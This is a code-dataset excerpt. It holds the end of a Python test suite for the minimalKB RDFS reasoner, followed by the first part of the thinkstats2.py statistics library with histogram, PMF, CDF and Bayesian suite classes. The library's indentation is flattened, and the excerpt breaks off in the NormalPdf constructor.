        # should not trigger an event
        self.kb += ["alfred desires ragnagna"]
        time.sleep(0.1)
        with self.assertRaises(Empty):
            self.kb.events.get_nowait()
        # should not trigger an event
        self.kb += ["ragnagna rdf:type Zorro"]
        time.sleep(0.1)
        with self.assertRaises(Empty):
            self.kb.events.get_nowait()
        # should trigger an event
        self.kb += ["Zorro rdfs:subClassOf Action"]
        time.sleep(REASONING_DELAY)
        # required to ensure the event is triggered after classification!
        self.kb += ["nop nop nop"]
        time.sleep(0.1)
        id, value = self.kb.events.get_nowait()
        self.assertEqual(id, evtid)
        self.assertCountEqual(value, [u"alfred"])

    def test_taxonomy_walking_inheritance(self):
        self.kb += ["john rdf:type Human"]
        self.assertCountEqual(self.kb.classesof("john"), [u'Human'])
        self.kb += ["Human rdfs:subClassOf Animal"]
        time.sleep(REASONING_DELAY)
        self.assertCountEqual(self.kb.classesof("john"), [u'Human', u'Animal'])
        self.assertCountEqual(self.kb.classesof("john", True), [u'Human'])
        self.kb -= ["john rdf:type Human"]
        time.sleep(REASONING_DELAY)
        self.assertFalse(self.kb.classesof("john"))

    def test_second_level_inheritance(self):
        self.kb += 'myself rdf:type Robot'
        self.kb += ['Robot rdfs:subClassOf Agent', 'Agent rdfs:subClassOf PhysicalEntity']
        time.sleep(REASONING_DELAY)
        self.assertTrue('Robot rdfs:subClassOf PhysicalEntity' in self.kb)
        self.assertTrue('myself rdf:type PhysicalEntity' in self.kb)

    def test_equivalent_classes_transitivity(self):
        self.kb += 'myself rdf:type Robot'
        self.kb += ['Robot owl:equivalentClass Machine', 'Machine owl:equivalentClass Automaton']
        self.kb += 'PR2 rdfs:subClassOf Automaton'
        time.sleep(REASONING_DELAY)
        self.assertTrue('Robot owl:equivalentClass Automaton' in self.kb)
        self.assertCountEqual(self.kb.classesof("myself"), [u'Robot', u'Machine', u'Automaton'])
        self.assertTrue('PR2 rdfs:subClassOf Robot' in self.kb)

    def test_existence_with_inference(self):
        self.kb += ["alfred rdf:type Human", "Human rdfs:subClassOf Animal"]
        time.sleep(REASONING_DELAY)
        self.assertTrue('alfred rdf:type Animal' in self.kb)
        self.kb += ["Animal rdfs:subClassOf Thing"]
        time.sleep(REASONING_DELAY)
        self.assertTrue('alfred rdf:type Thing' in self.kb)


def version():
    print("minimalKB RDFS reasoner tests %s" % __version__)


if __name__ == '__main__':
    import argparse

    parser = argparse.ArgumentParser(description='Test suite for minimalKB.')
    parser.add_argument('-v', '--version', action='version',
                        version=version(), help='returns minimalKB version')
    parser.add_argument('-f', '--failfast', action='store_true',
                        help='stops at first failed test')
    args = parser.parse_args()

    kblogger = logging.getLogger("kb")
    console = logging.StreamHandler()
    kblogger.setLevel(logging.DEBUG)
    kblogger.addHandler(console)

    unittest.main(failfast=args.failfast)
| bsd-3-clause | 121,374,193,478,665,800 | 29.728 | 97 | 0.633949 | false |
silky/ProbablyOverthinkingIt | thinkstats2.py | 1 | 69096 | """This file contains code for use with "Think Stats" and
"Think Bayes", both by Allen B. Downey, available from greenteapress.com
Copyright 2014 Allen B. Downey
License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html
"""
from __future__ import print_function, division
"""This file contains class definitions for:
Hist: represents a histogram (map from values to integer frequencies).
Pmf: represents a probability mass function (map from values to probs).
_DictWrapper: private parent class for Hist and Pmf.
Cdf: represents a discrete cumulative distribution function
Pdf: represents a continuous probability density function
"""
import bisect
import copy
import logging
import math
import random
import re
from collections import Counter
from operator import itemgetter
import thinkplot
import numpy as np
import pandas
import scipy
from scipy import stats
from scipy import special
from scipy import ndimage
from io import open
ROOT2 = math.sqrt(2)
def RandomSeed(x):
"""Initialize the random and np.random generators.
x: int seed
"""
random.seed(x)
np.random.seed(x)
def Odds(p):
"""Computes odds for a given probability.
Example: p=0.75 means 75 for and 25 against, or 3:1 odds in favor.
Note: when p=1, the formula for odds divides by zero, which is
normally undefined. But I think it is reasonable to define Odds(1)
to be infinity, so that's what this function does.
p: float 0-1
Returns: float odds
"""
if p == 1:
return float('inf')
return p / (1 - p)
def Probability(o):
"""Computes the probability corresponding to given odds.
Example: o=2 means 2:1 odds in favor, or 2/3 probability
o: float odds, strictly positive
Returns: float probability
"""
return o / (o + 1)
def Probability2(yes, no):
"""Computes the probability corresponding to given odds.
Example: yes=2, no=1 means 2:1 odds in favor, or 2/3 probability.
yes, no: int or float odds in favor
"""
return yes / (yes + no)
class Interpolator(object):
"""Represents a mapping between sorted sequences; performs linear interp.
Attributes:
xs: sorted list
ys: sorted list
"""
def __init__(self, xs, ys):
self.xs = xs
self.ys = ys
def Lookup(self, x):
"""Looks up x and returns the corresponding value of y."""
return self._Bisect(x, self.xs, self.ys)
def Reverse(self, y):
"""Looks up y and returns the corresponding value of x."""
return self._Bisect(y, self.ys, self.xs)
def _Bisect(self, x, xs, ys):
"""Helper function."""
if x <= xs[0]:
return ys[0]
if x >= xs[-1]:
return ys[-1]
i = bisect.bisect(xs, x)
frac = 1.0 * (x - xs[i - 1]) / (xs[i] - xs[i - 1])
y = ys[i - 1] + frac * 1.0 * (ys[i] - ys[i - 1])
return y
class _DictWrapper(object):
"""An object that contains a dictionary."""
def __init__(self, obj=None, label=None):
"""Initializes the distribution.
obj: Hist, Pmf, Cdf, Pdf, dict, pandas Series, list of pairs
label: string label
"""
self.label = label if label is not None else '_nolegend_'
self.d = {}
# flag whether the distribution is under a log transform
self.log = False
if obj is None:
return
if isinstance(obj, (_DictWrapper, Cdf, Pdf)):
self.label = label if label is not None else obj.label
if isinstance(obj, dict):
self.d.update(obj.items())
elif isinstance(obj, (_DictWrapper, Cdf, Pdf)):
self.d.update(obj.Items())
elif isinstance(obj, pandas.Series):
self.d.update(obj.value_counts().iteritems())
else:
# finally, treat it like a list
self.d.update(Counter(obj))
if len(self) > 0 and isinstance(self, Pmf):
self.Normalize()
def __hash__(self):
return id(self)
def __str__(self):
cls = self.__class__.__name__
return '%s(%s)' % (cls, str(self.d))
__repr__ = __str__
def __eq__(self, other):
return self.d == other.d
def __len__(self):
return len(self.d)
def __iter__(self):
return iter(self.d)
def iterkeys(self):
"""Returns an iterator over keys."""
return iter(self.d)
def __contains__(self, value):
return value in self.d
def __getitem__(self, value):
return self.d.get(value, 0)
def __setitem__(self, value, prob):
self.d[value] = prob
def __delitem__(self, value):
del self.d[value]
def Copy(self, label=None):
"""Returns a copy.
Make a shallow copy of d. If you want a deep copy of d,
use copy.deepcopy on the whole object.
label: string label for the new Hist
returns: new _DictWrapper with the same type
"""
new = copy.copy(self)
new.d = copy.copy(self.d)
new.label = label if label is not None else self.label
return new
def Scale(self, factor):
"""Multiplies the values by a factor.
factor: what to multiply by
Returns: new object
"""
new = self.Copy()
new.d.clear()
for val, prob in self.Items():
new.Set(val * factor, prob)
return new
def Log(self, m=None):
"""Log transforms the probabilities.
Removes values with probability 0.
Normalizes so that the largest logprob is 0.
"""
if self.log:
raise ValueError("Pmf/Hist already under a log transform")
self.log = True
if m is None:
m = self.MaxLike()
for x, p in self.d.items():
if p:
self.Set(x, math.log(p / m))
else:
self.Remove(x)
def Exp(self, m=None):
"""Exponentiates the probabilities.
m: how much to shift the ps before exponentiating
If m is None, normalizes so that the largest prob is 1.
"""
if not self.log:
raise ValueError("Pmf/Hist not under a log transform")
self.log = False
if m is None:
m = self.MaxLike()
for x, p in self.d.items():
self.Set(x, math.exp(p - m))
def GetDict(self):
"""Gets the dictionary."""
return self.d
def SetDict(self, d):
"""Sets the dictionary."""
self.d = d
def Values(self):
"""Gets an unsorted sequence of values.
Note: one source of confusion is that the keys of this
dictionary are the values of the Hist/Pmf, and the
values of the dictionary are frequencies/probabilities.
"""
return self.d.keys()
def Items(self):
"""Gets an unsorted sequence of (value, freq/prob) pairs."""
return self.d.items()
def Render(self, **options):
"""Generates a sequence of points suitable for plotting.
Note: options are ignored
Returns:
tuple of (sorted value sequence, freq/prob sequence)
"""
if min(self.d.keys()) is np.nan:
logging.warning('Hist: contains NaN, may not render correctly.')
return zip(*sorted(self.Items()))
def MakeCdf(self, label=None):
"""Makes a Cdf."""
label = label if label is not None else self.label
return Cdf(self, label=label)
def Print(self):
"""Prints the values and freqs/probs in ascending order."""
for val, prob in sorted(self.d.items()):
print(val, prob)
def Set(self, x, y=0):
"""Sets the freq/prob associated with the value x.
Args:
x: number value
y: number freq or prob
"""
self.d[x] = y
def Incr(self, x, term=1):
"""Increments the freq/prob associated with the value x.
Args:
x: number value
term: how much to increment by
"""
self.d[x] = self.d.get(x, 0) + term
def Mult(self, x, factor):
"""Scales the freq/prob associated with the value x.
Args:
x: number value
factor: how much to multiply by
"""
self.d[x] = self.d.get(x, 0) * factor
def Remove(self, x):
"""Removes a value.
Throws an exception if the value is not there.
Args:
x: value to remove
"""
del self.d[x]
def Total(self):
"""Returns the total of the frequencies/probabilities in the map."""
total = sum(self.d.values())
return total
def MaxLike(self):
"""Returns the largest frequency/probability in the map."""
return max(self.d.values())
def Largest(self, n=10):
"""Returns the largest n values, with frequency/probability.
n: number of items to return
"""
return sorted(self.d.items(), reverse=True)[:n]
def Smallest(self, n=10):
"""Returns the smallest n values, with frequency/probability.
n: number of items to return
"""
return sorted(self.d.items(), reverse=False)[:n]
class Hist(_DictWrapper):
"""Represents a histogram, which is a map from values to frequencies.
Values can be any hashable type; frequencies are integer counters.
"""
def Freq(self, x):
"""Gets the frequency associated with the value x.
Args:
x: number value
Returns:
int frequency
"""
return self.d.get(x, 0)
def Freqs(self, xs):
"""Gets frequencies for a sequence of values."""
return [self.Freq(x) for x in xs]
def IsSubset(self, other):
"""Checks whether the values in this histogram are a subset of
the values in the given histogram."""
for val, freq in self.Items():
if freq > other.Freq(val):
return False
return True
def Subtract(self, other):
"""Subtracts the values in the given histogram from this histogram."""
for val, freq in other.Items():
self.Incr(val, -freq)
class Pmf(_DictWrapper):
"""Represents a probability mass function.
Values can be any hashable type; probabilities are floating-point.
Pmfs are not necessarily normalized.
"""
def Prob(self, x, default=0):
"""Gets the probability associated with the value x.
Args:
x: number value
default: value to return if the key is not there
Returns:
float probability
"""
return self.d.get(x, default)
def Probs(self, xs):
"""Gets probabilities for a sequence of values."""
return [self.Prob(x) for x in xs]
def Percentile(self, percentage):
"""Computes a percentile of a given Pmf.
Note: this is not super efficient. If you are planning
to compute more than a few percentiles, compute the Cdf.
percentage: float 0-100
returns: value from the Pmf
"""
p = percentage / 100.0
total = 0
for val, prob in sorted(self.Items()):
total += prob
if total >= p:
return val
def ProbGreater(self, x):
"""Probability that a sample from this Pmf exceeds x.
x: number
returns: float probability
"""
if isinstance(x, _DictWrapper):
return PmfProbGreater(self, x)
else:
t = [prob for (val, prob) in self.d.items() if val > x]
return sum(t)
def ProbLess(self, x):
"""Probability that a sample from this Pmf is less than x.
x: number
returns: float probability
"""
if isinstance(x, _DictWrapper):
return PmfProbLess(self, x)
else:
t = [prob for (val, prob) in self.d.items() if val < x]
return sum(t)
def __lt__(self, obj):
"""Less than.
obj: number or _DictWrapper
returns: float probability
"""
return self.ProbLess(obj)
def __gt__(self, obj):
"""Greater than.
obj: number or _DictWrapper
returns: float probability
"""
return self.ProbGreater(obj)
def __ge__(self, obj):
"""Greater than or equal.
obj: number or _DictWrapper
returns: float probability
"""
return 1 - (self < obj)
def __le__(self, obj):
"""Less than or equal.
obj: number or _DictWrapper
returns: float probability
"""
return 1 - (self > obj)
def Normalize(self, fraction=1.0):
"""Normalizes this PMF so the sum of all probs is fraction.
Args:
fraction: what the total should be after normalization
Returns: the total probability before normalizing
"""
if self.log:
raise ValueError("Normalize: Pmf is under a log transform")
total = self.Total()
if total == 0.0:
raise ValueError('Normalize: total probability is zero.')
#logging.warning('Normalize: total probability is zero.')
#return total
factor = fraction / total
for x in self.d:
self.d[x] *= factor
return total
def Random(self):
"""Chooses a random element from this PMF.
Note: this is not very efficient. If you plan to call
this more than a few times, consider converting to a CDF.
Returns:
float value from the Pmf
"""
target = random.random()
total = 0.0
for x, p in self.d.items():
total += p
if total >= target:
return x
# we shouldn't get here
raise ValueError('Random: Pmf might not be normalized.')
def Mean(self):
"""Computes the mean of a PMF.
Returns:
float mean
"""
mean = 0.0
for x, p in self.d.items():
mean += p * x
return mean
def Var(self, mu=None):
"""Computes the variance of a PMF.
mu: the point around which the variance is computed;
if omitted, computes the mean
returns: float variance
"""
if mu is None:
mu = self.Mean()
var = 0.0
for x, p in self.d.items():
var += p * (x - mu) ** 2
return var
def Std(self, mu=None):
"""Computes the standard deviation of a PMF.
mu: the point around which the variance is computed;
if omitted, computes the mean
returns: float standard deviation
"""
var = self.Var(mu)
return math.sqrt(var)
def MaximumLikelihood(self):
"""Returns the value with the highest probability.
Returns: float probability
"""
_, val = max((prob, val) for val, prob in self.Items())
return val
def CredibleInterval(self, percentage=90):
"""Computes the central credible interval.
If percentage=90, computes the 90% CI.
Args:
percentage: float between 0 and 100
Returns:
sequence of two floats, low and high
"""
cdf = self.MakeCdf()
return cdf.CredibleInterval(percentage)
def __add__(self, other):
"""Computes the Pmf of the sum of values drawn from self and other.
other: another Pmf or a scalar
returns: new Pmf
"""
try:
return self.AddPmf(other)
except AttributeError:
return self.AddConstant(other)
def AddPmf(self, other):
"""Computes the Pmf of the sum of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
pmf = Pmf()
for v1, p1 in self.Items():
for v2, p2 in other.Items():
pmf.Incr(v1 + v2, p1 * p2)
return pmf
def AddConstant(self, other):
"""Computes the Pmf of the sum a constant and values from self.
other: a number
returns: new Pmf
"""
pmf = Pmf()
for v1, p1 in self.Items():
pmf.Set(v1 + other, p1)
return pmf
def __sub__(self, other):
"""Computes the Pmf of the diff of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
try:
return self.SubPmf(other)
except AttributeError:
return self.AddConstant(-other)
def SubPmf(self, other):
"""Computes the Pmf of the diff of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
pmf = Pmf()
for v1, p1 in self.Items():
for v2, p2 in other.Items():
pmf.Incr(v1 - v2, p1 * p2)
return pmf
def __mul__(self, other):
"""Computes the Pmf of the product of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
try:
return self.MulPmf(other)
except AttributeError:
return self.MulConstant(other)
def MulPmf(self, other):
"""Computes the Pmf of the diff of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
pmf = Pmf()
for v1, p1 in self.Items():
for v2, p2 in other.Items():
pmf.Incr(v1 * v2, p1 * p2)
return pmf
def MulConstant(self, other):
"""Computes the Pmf of the product of a constant and values from self.
other: a number
returns: new Pmf
"""
pmf = Pmf()
for v1, p1 in self.Items():
pmf.Set(v1 * other, p1)
return pmf
def __div__(self, other):
"""Computes the Pmf of the ratio of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
try:
return self.DivPmf(other)
except AttributeError:
return self.MulConstant(1/other)
__truediv__ = __div__
def DivPmf(self, other):
"""Computes the Pmf of the ratio of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
pmf = Pmf()
for v1, p1 in self.Items():
for v2, p2 in other.Items():
pmf.Incr(v1 / v2, p1 * p2)
return pmf
def Max(self, k):
"""Computes the CDF of the maximum of k selections from this dist.
k: int
returns: new Cdf
"""
cdf = self.MakeCdf()
return cdf.Max(k)
class Joint(Pmf):
"""Represents a joint distribution.
The values are sequences (usually tuples)
"""
def Marginal(self, i, label=None):
"""Gets the marginal distribution of the indicated variable.
i: index of the variable we want
Returns: Pmf
"""
pmf = Pmf(label=label)
for vs, prob in self.Items():
pmf.Incr(vs[i], prob)
return pmf
def Conditional(self, i, j, val, label=None):
"""Gets the conditional distribution of the indicated variable.
Distribution of vs[i], conditioned on vs[j] = val.
i: index of the variable we want
j: which variable is conditioned on
val: the value the jth variable has to have
Returns: Pmf
"""
pmf = Pmf(label=label)
for vs, prob in self.Items():
if vs[j] != val:
continue
pmf.Incr(vs[i], prob)
pmf.Normalize()
return pmf
def MaxLikeInterval(self, percentage=90):
"""Returns the maximum-likelihood credible interval.
If percentage=90, computes a 90% CI containing the values
with the highest likelihoods.
percentage: float between 0 and 100
Returns: list of values from the suite
"""
interval = []
total = 0
t = [(prob, val) for val, prob in self.Items()]
t.sort(reverse=True)
for prob, val in t:
interval.append(val)
total += prob
if total >= percentage / 100.0:
break
return interval
def MakeJoint(pmf1, pmf2):
"""Joint distribution of values from pmf1 and pmf2.
Assumes that the PMFs represent independent random variables.
Args:
pmf1: Pmf object
pmf2: Pmf object
Returns:
Joint pmf of value pairs
"""
joint = Joint()
for v1, p1 in pmf1.Items():
for v2, p2 in pmf2.Items():
joint.Set((v1, v2), p1 * p2)
return joint
def MakeHistFromList(t, label=None):
"""Makes a histogram from an unsorted sequence of values.
Args:
t: sequence of numbers
label: string label for this histogram
Returns:
Hist object
"""
return Hist(t, label=label)
def MakeHistFromDict(d, label=None):
"""Makes a histogram from a map from values to frequencies.
Args:
d: dictionary that maps values to frequencies
label: string label for this histogram
Returns:
Hist object
"""
return Hist(d, label)
def MakePmfFromList(t, label=None):
"""Makes a PMF from an unsorted sequence of values.
Args:
t: sequence of numbers
label: string label for this PMF
Returns:
Pmf object
"""
return Pmf(t, label=label)
def MakePmfFromDict(d, label=None):
"""Makes a PMF from a map from values to probabilities.
Args:
d: dictionary that maps values to probabilities
label: string label for this PMF
Returns:
Pmf object
"""
return Pmf(d, label=label)
def MakePmfFromItems(t, label=None):
"""Makes a PMF from a sequence of value-probability pairs
Args:
t: sequence of value-probability pairs
label: string label for this PMF
Returns:
Pmf object
"""
return Pmf(dict(t), label=label)
def MakePmfFromHist(hist, label=None):
"""Makes a normalized PMF from a Hist object.
Args:
hist: Hist object
label: string label
Returns:
Pmf object
"""
if label is None:
label = hist.label
return Pmf(hist, label=label)
def MakeMixture(metapmf, label='mix'):
"""Make a mixture distribution.
Args:
metapmf: Pmf that maps from Pmfs to probs.
label: string label for the new Pmf.
Returns: Pmf object.
"""
mix = Pmf(label=label)
for pmf, p1 in metapmf.Items():
for x, p2 in pmf.Items():
mix.Incr(x, p1 * p2)
return mix
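# Illustrative sketch (editor's addition, not part of the original module):
# MakeMixture expects a meta-Pmf whose *values* are themselves Pmf objects.
# The hypothetical example below mixes two Poisson approximations with
# weights 0.7 and 0.3 (MakePoissonPmf is defined later in this module):
#   metapmf = Pmf()
#   metapmf.Set(MakePoissonPmf(1.0, high=10), 0.7)
#   metapmf.Set(MakePoissonPmf(3.0, high=10), 0.3)
#   mix = MakeMixture(metapmf, label='poisson mixture')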
def MakeUniformPmf(low, high, n):
"""Make a uniform Pmf.
low: lowest value (inclusive)
high: highest value (inclusive)
n: number of values
"""
pmf = Pmf()
for x in np.linspace(low, high, n):
pmf.Set(x, 1)
pmf.Normalize()
return pmf
class Cdf(object):
"""Represents a cumulative distribution function.
Attributes:
xs: sequence of values
ps: sequence of probabilities
label: string used as a graph label.
"""
def __init__(self, obj=None, ps=None, label=None):
"""Initializes.
If ps is provided, obj must be the corresponding list of values.
obj: Hist, Pmf, Cdf, Pdf, dict, pandas Series, list of pairs
ps: list of cumulative probabilities
label: string label
"""
self.label = label if label is not None else '_nolegend_'
if isinstance(obj, (_DictWrapper, Cdf, Pdf)):
if not label:
self.label = label if label is not None else obj.label
if obj is None:
# caller does not provide obj, make an empty Cdf
self.xs = np.asarray([])
self.ps = np.asarray([])
if ps is not None:
logging.warning("Cdf: can't pass ps without also passing xs.")
return
else:
# if the caller provides xs and ps, just store them
if ps is not None:
if isinstance(ps, str):
logging.warning("Cdf: ps can't be a string")
self.xs = np.asarray(obj)
self.ps = np.asarray(ps)
return
# caller has provided just obj, not ps
if isinstance(obj, Cdf):
self.xs = copy.copy(obj.xs)
self.ps = copy.copy(obj.ps)
return
if isinstance(obj, _DictWrapper):
dw = obj
else:
dw = Hist(obj)
if len(dw) == 0:
self.xs = np.asarray([])
self.ps = np.asarray([])
return
xs, freqs = zip(*sorted(dw.Items()))
self.xs = np.asarray(xs)
self.ps = np.cumsum(freqs, dtype=np.float)
self.ps /= self.ps[-1]
def __str__(self):
return 'Cdf(%s, %s)' % (str(self.xs), str(self.ps))
__repr__ = __str__
def __len__(self):
return len(self.xs)
def __getitem__(self, x):
return self.Prob(x)
def __setitem__(self):
raise UnimplementedMethodException()
def __delitem__(self):
raise UnimplementedMethodException()
def __eq__(self, other):
return np.all(self.xs == other.xs) and np.all(self.ps == other.ps)
def Copy(self, label=None):
"""Returns a copy of this Cdf.
label: string label for the new Cdf
"""
if label is None:
label = self.label
return Cdf(list(self.xs), list(self.ps), label=label)
def MakePmf(self, label=None):
"""Makes a Pmf."""
if label is None:
label = self.label
return Pmf(self, label=label)
def Values(self):
"""Returns a sorted list of values.
"""
return self.xs
def Items(self):
"""Returns a sorted sequence of (value, probability) pairs.
Note: in Python3, returns an iterator.
"""
a = self.ps
b = np.roll(a, 1)
b[0] = 0
return zip(self.xs, a-b)
def Shift(self, term):
"""Adds a term to the xs.
term: how much to add
"""
new = self.Copy()
# don't use +=, or else an int array + float yields int array
new.xs = new.xs + term
return new
def Scale(self, factor):
"""Multiplies the xs by a factor.
factor: what to multiply by
"""
new = self.Copy()
# don't use *=, or else an int array * float yields int array
new.xs = new.xs * factor
return new
def Prob(self, x):
"""Returns CDF(x), the probability that corresponds to value x.
Args:
x: number
Returns:
float probability
"""
if x < self.xs[0]:
return 0.0
index = bisect.bisect(self.xs, x)
p = self.ps[index-1]
return p
def Probs(self, xs):
"""Gets probabilities for a sequence of values.
xs: any sequence that can be converted to NumPy array
returns: NumPy array of cumulative probabilities
"""
xs = np.asarray(xs)
index = np.searchsorted(self.xs, xs, side='right')
ps = self.ps[index-1]
ps[xs < self.xs[0]] = 0.0
return ps
ProbArray = Probs
def Value(self, p):
"""Returns InverseCDF(p), the value that corresponds to probability p.
Args:
p: number in the range [0, 1]
Returns:
number value
"""
if p < 0 or p > 1:
raise ValueError('Probability p must be in range [0, 1]')
index = bisect.bisect_left(self.ps, p)
return self.xs[index]
def ValueArray(self, ps):
"""Returns InverseCDF(p), the value that corresponds to probability p.
Args:
ps: NumPy array of numbers in the range [0, 1]
Returns:
NumPy array of values
"""
ps = np.asarray(ps)
if np.any(ps < 0) or np.any(ps > 1):
raise ValueError('Probability p must be in range [0, 1]')
index = np.searchsorted(self.ps, ps, side='left')
return self.xs[index]
def Percentile(self, p):
"""Returns the value that corresponds to percentile p.
Args:
p: number in the range [0, 100]
Returns:
number value
"""
return self.Value(p / 100.0)
def PercentileRank(self, x):
"""Returns the percentile rank of the value x.
x: potential value in the CDF
returns: percentile rank in the range 0 to 100
"""
return self.Prob(x) * 100.0
def Random(self):
"""Chooses a random value from this distribution."""
return self.Value(random.random())
def Sample(self, n):
"""Generates a random sample from this distribution.
n: int length of the sample
returns: NumPy array
"""
ps = np.random.random(n)
return self.ValueArray(ps)
def Mean(self):
"""Computes the mean of a CDF.
Returns:
float mean
"""
old_p = 0
total = 0.0
for x, new_p in zip(self.xs, self.ps):
p = new_p - old_p
total += p * x
old_p = new_p
return total
def CredibleInterval(self, percentage=90):
"""Computes the central credible interval.
If percentage=90, computes the 90% CI.
Args:
percentage: float between 0 and 100
Returns:
sequence of two floats, low and high
"""
prob = (1 - percentage / 100.0) / 2
interval = self.Value(prob), self.Value(1 - prob)
return interval
ConfidenceInterval = CredibleInterval
def _Round(self, multiplier=1000.0):
"""
An entry is added to the cdf only if the percentile differs
from the previous value in a significant digit, where the number
of significant digits is determined by multiplier. The
default is 1000, which keeps log10(1000) = 3 significant digits.
"""
# TODO(write this method)
raise UnimplementedMethodException()
def Render(self, **options):
"""Generates a sequence of points suitable for plotting.
An empirical CDF is a step function; linear interpolation
can be misleading.
Note: options are ignored
Returns:
tuple of (xs, ps)
"""
def interleave(a, b):
c = np.empty(a.shape[0] + b.shape[0])
c[::2] = a
c[1::2] = b
return c
a = np.array(self.xs)
xs = interleave(a, a)
shift_ps = np.roll(self.ps, 1)
shift_ps[0] = 0
ps = interleave(shift_ps, self.ps)
return xs, ps
def Max(self, k):
"""Computes the CDF of the maximum of k selections from this dist.
k: int
returns: new Cdf
"""
cdf = self.Copy()
cdf.ps **= k
return cdf
def MakeCdfFromItems(items, label=None):
"""Makes a cdf from an unsorted sequence of (value, frequency) pairs.
Args:
items: unsorted sequence of (value, frequency) pairs
label: string label for this CDF
Returns:
cdf: list of (value, fraction) pairs
"""
return Cdf(dict(items), label=label)
def MakeCdfFromDict(d, label=None):
"""Makes a CDF from a dictionary that maps values to frequencies.
Args:
d: dictionary that maps values to frequencies.
label: string label for the data.
Returns:
Cdf object
"""
return Cdf(d, label=label)
def MakeCdfFromList(seq, label=None):
"""Creates a CDF from an unsorted sequence.
Args:
seq: unsorted sequence of sortable values
label: string label for the cdf
Returns:
Cdf object
"""
return Cdf(seq, label=label)
def MakeCdfFromHist(hist, label=None):
"""Makes a CDF from a Hist object.
Args:
hist: Pmf.Hist object
label: string label for the data.
Returns:
Cdf object
"""
if label is None:
label = hist.label
return Cdf(hist, label=label)
def MakeCdfFromPmf(pmf, label=None):
"""Makes a CDF from a Pmf object.
Args:
pmf: Pmf.Pmf object
label: string label for the data.
Returns:
Cdf object
"""
if label is None:
label = pmf.label
return Cdf(pmf, label=label)
class UnimplementedMethodException(Exception):
"""Exception if someone calls a method that should be overridden."""
class Suite(Pmf):
"""Represents a suite of hypotheses and their probabilities."""
def Update(self, data):
"""Updates each hypothesis based on the data.
data: any representation of the data
returns: the normalizing constant
"""
for hypo in self.Values():
like = self.Likelihood(data, hypo)
self.Mult(hypo, like)
return self.Normalize()
def LogUpdate(self, data):
"""Updates a suite of hypotheses based on new data.
Modifies the suite directly; if you want to keep the original, make
a copy.
Note: unlike Update, LogUpdate does not normalize.
Args:
data: any representation of the data
"""
for hypo in self.Values():
like = self.LogLikelihood(data, hypo)
self.Incr(hypo, like)
def UpdateSet(self, dataset):
"""Updates each hypothesis based on the dataset.
This is more efficient than calling Update repeatedly because
it waits until the end to Normalize.
Modifies the suite directly; if you want to keep the original, make
a copy.
dataset: a sequence of data
returns: the normalizing constant
"""
for data in dataset:
for hypo in self.Values():
like = self.Likelihood(data, hypo)
self.Mult(hypo, like)
return self.Normalize()
def LogUpdateSet(self, dataset):
"""Updates each hypothesis based on the dataset.
Modifies the suite directly; if you want to keep the original, make
a copy.
dataset: a sequence of data
returns: None
"""
for data in dataset:
self.LogUpdate(data)
def Likelihood(self, data, hypo):
"""Computes the likelihood of the data under the hypothesis.
hypo: some representation of the hypothesis
data: some representation of the data
"""
raise UnimplementedMethodException()
def LogLikelihood(self, data, hypo):
"""Computes the log likelihood of the data under the hypothesis.
hypo: some representation of the hypothesis
data: some representation of the data
"""
raise UnimplementedMethodException()
def Print(self):
"""Prints the hypotheses and their probabilities."""
for hypo, prob in sorted(self.Items()):
print(hypo, prob)
def MakeOdds(self):
"""Transforms from probabilities to odds.
Values with prob=0 are removed.
"""
for hypo, prob in self.Items():
if prob:
self.Set(hypo, Odds(prob))
else:
self.Remove(hypo)
def MakeProbs(self):
"""Transforms from odds to probabilities."""
for hypo, odds in self.Items():
self.Set(hypo, Probability(odds))
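# Illustrative sketch (editor's addition, not part of the original module).
# Suite is meant to be subclassed with a Likelihood method; the hypothetical
# example below estimates the probability of heads for a coin from a
# sequence of 'H'/'T' observations.
class _ExampleCoinSuite(Suite):
    """Posterior distribution of p(heads) for a possibly biased coin."""
    def Likelihood(self, data, hypo):
        # hypo is a candidate probability of heads; data is 'H' or 'T'
        return hypo if data == 'H' else 1 - hypo
# Usage sketch:
#   suite = _ExampleCoinSuite([x / 100.0 for x in range(101)])
#   for outcome in 'HHTH':
#       suite.Update(outcome)
#   suite.MaximumLikelihood()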
def MakeSuiteFromList(t, label=None):
"""Makes a suite from an unsorted sequence of values.
Args:
t: sequence of numbers
label: string label for this suite
Returns:
Suite object
"""
hist = MakeHistFromList(t, label=label)
d = hist.GetDict()
return MakeSuiteFromDict(d)
def MakeSuiteFromHist(hist, label=None):
"""Makes a normalized suite from a Hist object.
Args:
hist: Hist object
label: string label
Returns:
Suite object
"""
if label is None:
label = hist.label
# make a copy of the dictionary
d = dict(hist.GetDict())
return MakeSuiteFromDict(d, label)
def MakeSuiteFromDict(d, label=None):
"""Makes a suite from a map from values to probabilities.
Args:
d: dictionary that maps values to probabilities
label: string label for this suite
Returns:
Suite object
"""
suite = Suite(label=label)
suite.SetDict(d)
suite.Normalize()
return suite
class Pdf(object):
"""Represents a probability density function (PDF)."""
def Density(self, x):
"""Evaluates this Pdf at x.
Returns: float or NumPy array of probability density
"""
raise UnimplementedMethodException()
def GetLinspace(self):
"""Get a linspace for plotting.
Not all subclasses of Pdf implement this.
Returns: numpy array
"""
raise UnimplementedMethodException()
def MakePmf(self, **options):
"""Makes a discrete version of this Pdf.
options can include
label: string
low: low end of range
high: high end of range
n: number of places to evaluate
Returns: new Pmf
"""
label = options.pop('label', '')
xs, ds = self.Render(**options)
return Pmf(dict(zip(xs, ds)), label=label)
def Render(self, **options):
"""Generates a sequence of points suitable for plotting.
If options includes low and high, it must also include n;
in that case the density is evaluated at n locations between
low and high, including both.
If options includes xs, the density is evaluated at those locations.
Otherwise, self.GetLinspace is invoked to provide the locations.
Returns:
tuple of (xs, densities)
"""
low, high = options.pop('low', None), options.pop('high', None)
if low is not None and high is not None:
n = options.pop('n', 101)
xs = np.linspace(low, high, n)
else:
xs = options.pop('xs', None)
if xs is None:
xs = self.GetLinspace()
ds = self.Density(xs)
return xs, ds
def Items(self):
"""Generates a sequence of (value, probability) pairs.
"""
return zip(*self.Render())
class NormalPdf(Pdf):
"""Represents the PDF of a Normal distribution."""
def __init__(self, mu=0, sigma=1, label=None):
"""Constructs a Normal Pdf with given mu and sigma.
mu: mean
sigma: standard deviation
label: string
"""
self.mu = mu
self.sigma = sigma
